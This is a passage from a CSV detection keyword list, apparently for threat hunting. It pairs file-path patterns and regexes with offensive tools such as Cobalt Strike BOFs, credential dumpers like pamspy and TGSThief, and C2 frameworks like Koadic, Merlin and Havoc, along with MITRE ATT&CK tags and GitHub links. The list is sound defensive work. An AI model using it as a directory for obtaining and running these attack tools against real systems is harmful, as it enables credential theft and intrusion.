user-mode hooks utilised by AV/EPP/EDR etc. In order to bypass the user-mode hooks. it first collects the syscall numbers of the NtOpenFile. NtCreateSection. NtOpenSection and NtMapViewOfSection found in the LdrpThunkSignature array.","T1055.004 - T1562.004 - T1070.004","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/RefleXXion","1","1","N/A","10","5","478","103","2022-01-25T17:06:21Z","2022-01-25T16:50:34Z" "*/reg_hive_sam.py*",".{0,1000}\/reg_hive_sam\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/reg_hive_security.py*",".{0,1000}\/reg_hive_security\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/reg_hive_system.py*",".{0,1000}\/reg_hive_system\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*/reg_recover-rs.exe*",".{0,1000}\/reg_recover\-rs\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002 - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tools","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","10","8","715","68","2024-04-24T14:16:09Z","2023-11-29T16:07:06Z" "*/reGeorg.git*",".{0,1000}\/reGeorg\.git.{0,1000}","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.","T1090 - T1095 - T1572","TA0003 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2936","814","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z" "*/RegistryPersistence.c*",".{0,1000}\/RegistryPersistence\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","10","10","517","52","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z" "*/Registry-Recon/*",".{0,1000}\/Registry\-Recon\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","10","10","317","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z" "*/reg-query.py*",".{0,1000}\/reg\-query\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/regread.lua*",".{0,1000}\/regread\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/regreeper.jpg*",".{0,1000}\/regreeper\.jpg.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*/Reg-Restore-Persistence-Mole*",".{0,1000}\/Reg\-Restore\-Persistence\-Mole.{0,1000}","offensive_tool_keyword","regreeper","gain persistence and evade sysmon event code registry (creation update and deletion) REG_NOTIFY_CLASS Registry Callback of sysmon driver filter. RegSaveKeyExW() and RegRestoreKeyW() API which is not included in monitoring.","T1050.005 - T1012 - T1112 - T1553.002 - T1053.005","TA0005 - TA0003 - TA0007","N/A","N/A","Defense Evasion - Persistence","https://github.com/tccontre/Reg-Restore-Persistence-Mole","1","1","N/A","10","1","50","16","2023-08-23T11:34:26Z","2023-08-03T14:47:45Z" "*/regsvcs/meterpreter*",".{0,1000}\/regsvcs\/meterpreter.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/regsvr.cmd*",".{0,1000}\/regsvr\.cmd.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/regsvr32/shellcode_inject*",".{0,1000}\/regsvr32\/shellcode_inject.{0,1000}","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","1","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "*/regwrite.lua*",".{0,1000}\/regwrite\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/regwritedel.lua*",".{0,1000}\/regwritedel\.lua.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "*/releases/download/*/abc.exe*",".{0,1000}\/releases\/download\/.{0,1000}\/abc\.exe.{0,1000}","offensive_tool_keyword","TGSThief","get the TGS of a user whose logon session is just present on the computer","T1558 - T1558.003 - T1078 - T1078.005","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/MzHmO/TGSThief","1","1","N/A","9","2","146","22","2023-07-25T05:30:39Z","2023-07-23T07:47:05Z" "*/releases/download/v0.1/pamspy*",".{0,1000}\/releases\/download\/v0\.1\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/releases/download/v0.2/pamspy*",".{0,1000}\/releases\/download\/v0\.2\/pamspy.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*/releases/download/v1.0/ADFSRelay*",".{0,1000}\/releases\/download\/v1\.0\/ADFSRelay.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*/releases/download/v1.0/NTLMParse*",".{0,1000}\/releases\/download\/v1\.0\/NTLMParse.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","1","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "*/releases/latest/download/cloudflared-darwin-amd64.tgz*",".{0,1000}\/releases\/latest\/download\/cloudflared\-darwin\-amd64\.tgz.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*/releases/latest/download/lse.sh*",".{0,1000}\/releases\/latest\/download\/lse\.sh.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","3198","550","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z" "*/Remote/adcs_request/*",".{0,1000}\/Remote\/adcs_request\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/office_tokens/*",".{0,1000}\/Remote\/office_tokens\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/procdump/*",".{0,1000}\/Remote\/procdump\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/ProcessDestroy/*",".{0,1000}\/Remote\/ProcessDestroy\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/ProcessListHandles/*",".{0,1000}\/Remote\/ProcessListHandles\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/schtaskscreate/*",".{0,1000}\/Remote\/schtaskscreate\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/schtasksrun/*",".{0,1000}\/Remote\/schtasksrun\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/setuserpass/",".{0,1000}\/Remote\/setuserpass\/","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/setuserpass/*",".{0,1000}\/Remote\/setuserpass\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/Remote/unexpireuser/*",".{0,1000}\/Remote\/unexpireuser\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*/RemoteAccessPolicyEnumeration.ps1*",".{0,1000}\/RemoteAccessPolicyEnumeration\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/RemoteHashRetrieval.ps1*",".{0,1000}\/RemoteHashRetrieval\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/remote-method-guesser.git*",".{0,1000}\/remote\-method\-guesser\.git.{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*/RemoteOps.py*",".{0,1000}\/RemoteOps\.py.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - 